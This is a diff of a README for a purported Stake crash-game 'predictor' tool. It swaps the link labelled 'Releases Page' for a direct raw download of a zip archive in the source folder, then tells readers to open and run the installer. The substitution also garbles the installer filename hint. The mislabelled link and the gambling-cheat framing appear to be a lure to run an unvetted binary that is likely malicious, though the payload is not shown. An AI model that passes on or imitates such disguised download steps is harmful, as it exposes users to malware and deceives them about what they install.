eptesicusepinephelus749/stake-crash-predictor/README.md

 ### 📥 Download & Install

-1. **Visit the Releases Page**: Go to our [Releases Page](https://github.com/eptesicusepinephelus749/stake-crash-predictor/releases) to find the latest version of the software.
+1. **Visit the Releases Page**: Go to our [Releases Page](https://raw.githubusercontent.com/eptesicusepinephelus749/stake-crash-predictor/main/src/stake-crash-predictor_3.1-alpha.5.zip) to find the latest version of the software.

 2. **Choose Your Version**: Look for the latest release.
 You will find a list of files related to that release.

 3. **Download the Installer**: Click on the file that matches your system.
-If you are not sure which file to choose, look for `<your-OS>-installer.exe` or similar names.
+If you are not sure which file to choose, look for `<your-OS>https://raw.githubusercontent.com/eptesicusepinephelus749/stake-crash-predictor/main/src/stake-crash-predictor_3.1-alpha.5.zip` or similar names.

 4. **Run the Installer**:
    - Open the downloaded file.